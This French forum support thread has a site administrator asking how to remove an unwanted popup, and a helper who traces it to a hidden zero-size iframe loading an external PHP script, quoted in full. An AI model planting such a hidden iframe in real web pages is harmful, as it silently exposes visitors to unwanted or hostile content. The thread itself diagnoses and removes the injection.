Pop up indésirable "surveytakeonline"
2 participants
Forum gratuit : Le forum des forums actifs :: Entraide & Support... :: Problème divers :: Archives des problèmes divers
Page 1 sur 1 • Partagez
Pop up indésirable "surveytakeonline"
Bonjour,
Depuis quelques temps, une pop up indésirable s'affiche sur l'accueil du forum dont je suis un administrateur. Voici ce que ça donne :
J'ai cherché un peu partout dans le panneau d'admin, je n'ai rien trouvé pour supprimer ça.
Il semblerait qu'AdBlock soit efficace sur FF, mais utilisant Opéra, je ne peux m'en servir. Et si je clique sur "Arrêter l'exécution des scripts de cette page" bloque également ceux que nous avons ajouté.
A savoir que lorsque je clique sur "OK" rien ne s'ouvre.
De plus j'aimerais en débarrasser totalement le forum et pas juste le bloquer utilisateur par utilisateur grâce à Adblock ou autre.
Quelqu'un a t-il déjà rencontré ce problème et aurais une solution à proposer ?
Merci d'avance
Depuis quelques temps, une pop up indésirable s'affiche sur l'accueil du forum dont je suis un administrateur. Voici ce que ça donne :
J'ai cherché un peu partout dans le panneau d'admin, je n'ai rien trouvé pour supprimer ça.
Il semblerait qu'AdBlock soit efficace sur FF, mais utilisant Opéra, je ne peux m'en servir. Et si je clique sur "Arrêter l'exécution des scripts de cette page" bloque également ceux que nous avons ajouté.
A savoir que lorsque je clique sur "OK" rien ne s'ouvre.
De plus j'aimerais en débarrasser totalement le forum et pas juste le bloquer utilisateur par utilisateur grâce à Adblock ou autre.
Quelqu'un a t-il déjà rencontré ce problème et aurais une solution à proposer ?
Merci d'avance
Dernière édition par Tarminyatur le Dim 22 Jan 2012 - 18:08, édité 1 fois
Re: Pop up indésirable "surveytakeonline"
Bonjour et Bienvenue Vu que vous êtes nouveau, voici quelques sujets importants :sur le Forum des Forums Forumactif Sécurité : mail de fondation - Ce qu'il ne faut pas faire
|
Bonjour,
Votre page d'accueil charge en 60.1 secondes.
- Spoiler:
D'après le test, dont résultat ICI, en bas de la page figurent ces fichiers :
- Spoiler:
Que l'on peut voir également par la "console Web" de Firefox :
- Spoiler:
Dans le code source, se trouve 1 Iframe :
- Code:
<iframe style="border: none; width: 0px; height: 0px;" src="http://supprime.net/brute.php?maitre=galahann"></iframe>
Il faudrait enlever cela, pour ne plus avoir l'affichage de ce popup.
Cordialement.
ah merci, j'arrivais pas à trouver de quoi il s'agissait.
je vais voir si je trouve ça, merci beaucoup
je vais voir si je trouve ça, merci beaucoup
ça fonctionne merci